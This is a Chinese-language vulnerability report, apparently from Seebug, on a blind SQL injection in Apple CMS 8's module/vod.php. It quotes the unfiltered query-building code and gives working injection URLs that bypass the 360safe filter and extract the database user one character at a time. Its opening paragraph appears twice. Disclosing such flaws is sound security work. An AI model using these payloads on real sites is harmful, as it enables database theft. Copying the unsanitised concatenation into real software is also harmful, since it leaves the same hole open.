### 简要描述: 苹果cms8 sql盲注 ### 详细说明: module/vod.php:lines(154-176): ``` $tpl->P["des"] = $tpl->P["des"] . " Tag为" . $tpl->P["tag"]; $tpl->P["where"] = $tpl->P["where"] . " AND instr(d_tag,'".$tpl->P['tag']."')>0 "; } $tpl->P['typepid'] = 0; if(!isN($tpl->P["typeid"])){ $typearr = $MAC_CACHE['vodtype'][$tpl->P['typeid']]; if (is_array($typearr)){ $tpl->P['typepid'] = $typearr['t_pid']; if (isN($tpl->P["key"])){ $tpl->P["key"]= $typearr["t_name"]; } $tpl->P["des"] = $tpl->P["des"] . " 分类为" . $typearr["t_name"]; $tpl->P["where"] = $tpl->P["where"] . " AND d_type in (" . $typearr["childids"] . ") "; } unset($typearr); } if(!isN($tpl->P["classid"])){ $classarr = $MAC_CACHE['vodclass'][$tpl->P['classid']]; if (is_array($classarr)){ if (isN($tpl->P["key"])){ $tpl->P["key"]= $classarr["c_name"]; } $tpl->P["des"] = $tpl->P["des"] . " 剧情分类为" . $classarr["c_name"]; $tpl->P["where"] = $tpl->P["where"] . ' AND instr(d_class,\','.$tpl->P['classid'].',\')>0 '; } ```...
### 简要描述: 苹果cms8 sql盲注 ### 详细说明: module/vod.php:lines(154-176): ``` $tpl->P["des"] = $tpl->P["des"] . " Tag为" . $tpl->P["tag"]; $tpl->P["where"] = $tpl->P["where"] . " AND instr(d_tag,'".$tpl->P['tag']."')>0 "; } $tpl->P['typepid'] = 0; if(!isN($tpl->P["typeid"])){ $typearr = $MAC_CACHE['vodtype'][$tpl->P['typeid']]; if (is_array($typearr)){ $tpl->P['typepid'] = $typearr['t_pid']; if (isN($tpl->P["key"])){ $tpl->P["key"]= $typearr["t_name"]; } $tpl->P["des"] = $tpl->P["des"] . " 分类为" . $typearr["t_name"]; $tpl->P["where"] = $tpl->P["where"] . " AND d_type in (" . $typearr["childids"] . ") "; } unset($typearr); } if(!isN($tpl->P["classid"])){ $classarr = $MAC_CACHE['vodclass'][$tpl->P['classid']]; if (is_array($classarr)){ if (isN($tpl->P["key"])){ $tpl->P["key"]= $classarr["c_name"]; } $tpl->P["des"] = $tpl->P["des"] . " 剧情分类为" . $classarr["c_name"]; $tpl->P["where"] = $tpl->P["where"] . ' AND instr(d_class,\','.$tpl->P['classid'].',\')>0 '; } ``` 发现这里$tpl->P["where"] = $tpl->P["where"] . 直接 操作而且没有过滤,这里我们由于360safe的作用,导致union select 的类型无法操作,那么我们可以试试盲注猜解方法,一般的视频站点有初始值,我们的站点没有,我们在数据库加入一条: [<img src="https://images.seebug.org/upload/201408/28223927b0bbbbad8be7a6c3ffedb150752df57f.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/28223927b0bbbbad8be7a6c3ffedb150752df57f.png) 我们发送这样的一个url: http://localhost/maccms8/index.php?m=vod-search-pg-1-wd-sdsdsd-typeid-1-classid-32-where- and 0%23.html 当条件为0的时候 就是不成立,那么我们页面显示就是0条记录,默认情况下就是1条记录,这样我们就可以通过这样的url进行猜测 如图所示: [<img src="https://images.seebug.org/upload/201408/2822434899067b138c67be4dda0f1e6cd56261f1.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/2822434899067b138c67be4dda0f1e6cd56261f1.png) [<img src="https://images.seebug.org/upload/201408/2822440027e631b254704b0b01b47a0f23e7676b.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/2822440027e631b254704b0b01b47a0f23e7676b.png) [<img src="https://images.seebug.org/upload/201408/2822441114d4c3457bd7a4f9e7929ea0c3e7f114.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/2822441114d4c3457bd7a4f9e7929ea0c3e7f114.png) http://localhost/maccms8/index.php?m=vod-search-pg-1-wd-sdsdsd-typeid-1-classid-32-where- and if(ascii(substr(user(),1,1))=$NUM,1,0)%23.html 然后我们就能获取数据库信息 ### 漏洞证明:
